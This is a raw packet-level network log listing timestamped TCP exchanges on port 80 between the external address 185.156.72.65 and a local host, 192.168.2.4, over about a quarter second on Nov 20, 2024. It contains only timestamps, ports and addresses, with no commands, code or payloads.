                                                                Nov 20, 2024 05:02:21.957465887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957469940 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957483053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957495928 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957499981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957506895 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957525015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957535028 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957638979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957653999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957669020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957681894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957686901 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957694054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957705021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957707882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957720995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957729101 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957737923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957739115 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957758904 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957770109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957782984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957807064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957820892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957828045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957837105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957849026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957850933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957858086 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957866907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957880020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957880974 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957890034 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957911015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957920074 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957969904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957997084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958013058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958013058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958028078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958035946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958044052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958045959 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958059072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958060026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958076000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958076954 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958091021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958093882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958112955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958123922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958129883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958146095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958159924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958170891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958175898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958183050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958193064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958201885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958211899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958218098 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958229065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958259106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958264112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958275080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958291054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958307028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958312988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958323956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958338976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958338976 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958354950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958363056 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958369970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958384991 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958385944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958403111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958408117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958417892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958425045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958435059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958452940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958462954 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958471060 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958486080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958496094 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958503008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958507061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958518028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958534002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958534956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958553076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958560944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958570004 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958585024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958585024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958602905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958610058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958619118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958635092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958637953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958652020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958676100 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958759069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958774090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958789110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958801031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958803892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958818913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958821058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958833933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958837986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958856106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958861113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958874941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958887100 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958918095 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960546017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960561991 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960577965 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960591078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960623026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960692883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960709095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960724115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960737944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960752964 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960761070 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960768938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960783958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960786104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960825920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960844994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960844994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960850954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960859060 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960866928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960881948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960895061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960897923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960906982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960913897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960931063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960946083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960946083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960947990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960957050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960963011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960973024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960978985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960993052 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960997105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961004019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961016893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961031914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961036921 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961036921 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961047888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961061001 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961062908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961080074 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961083889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961093903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961093903 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961111069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961117983 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961127996 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.961148977 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.961165905 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.177692890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.177771091 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.184667110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.184779882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189560890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189585924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189605951 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189651966 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189690113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189733982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189749956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189764977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189779997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189790010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189795017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189820051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189838886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189847946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189863920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189879894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189896107 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189903021 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189910889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189928055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189932108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189944029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189953089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.189960957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189975977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.189985037 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190001965 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190010071 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190017939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190032959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190041065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190052032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190067053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190068007 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190084934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190084934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190104008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190108061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190121889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190139055 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190254927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190269947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190285921 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190300941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190318108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190320969 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190336943 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190347910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190355062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190357924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190383911 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190397024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190404892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190422058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190438032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190454960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190459013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190471888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190484047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190491915 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190507889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190509081 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190526009 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190538883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190576077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190593004 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190607071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190608025 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190618992 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190623999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190642118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190642118 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190660954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190670013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190681934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190685987 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190699100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190705061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190716028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190726995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190733910 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190742016 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190752983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190758944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190773010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190778017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190788984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190797091 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190805912 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190814018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190821886 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190833092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190839052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190845966 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190855980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190860033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190874100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190879107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190888882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190891027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190906048 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190912008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190928936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190934896 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190948963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190951109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190969944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190973997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.190983057 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.190992117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191008091 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191023111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191030979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191060066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191085100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191102028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191117048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191126108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191133976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191149950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191154003 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191168070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191181898 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191200018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191207886 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191232920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191248894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191268921 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191278934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191286087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191306114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191308022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191329956 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191329956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191349983 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191370964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191381931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191396952 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191415071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191420078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191432953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191437006 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191450119 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191456079 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191468000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191472054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191484928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191492081 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191505909 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191523075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191545010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191560984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191576004 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191581011 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191591978 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191597939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191613913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191623926 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191633940 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191648960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191664934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191687107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191700935 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191709995 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.191719055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.191736937 CET8049730185.156.72.65192.168.2.4
